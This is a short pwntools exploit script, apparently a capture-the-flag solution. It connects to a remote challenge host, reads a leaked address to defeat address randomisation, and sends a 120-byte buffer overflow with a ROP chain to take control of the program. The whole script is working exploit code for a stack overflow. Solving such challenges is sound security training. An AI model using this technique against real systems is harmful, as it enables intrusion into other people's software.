from pwn import *

exe = context.binary = ELF("./chall")
# context.log_level = 'debug'
# r = process()
r = remote("194.31.53.241",15127)
offset = 120
rop = ROP(exe)
r.recvline()
r.recvline()
r.recvline()
r.recvline()
r.recvline()
r.recvline()
r.recvline()
r.recvline()
r.recvline()
r.recvline()
r.recvline()
r.recvline()
r.recvline()
r.recvline()
r.recvline()
r.recvline()
r.recvline()
r.recvline()
r.recvuntil(b'Here is your leak: ')
leak = int(r.recvline().strip().decode(),16)
exe.address = leak - 0x11a9
print(f"exe.address: {hex(exe.address)}")
rop.raw(b"A" * offset)
rop.raw(exe.address + 0x0000000000001016)
rop.raw(leak)
r.sendline(rop.chain())
r.interactive()
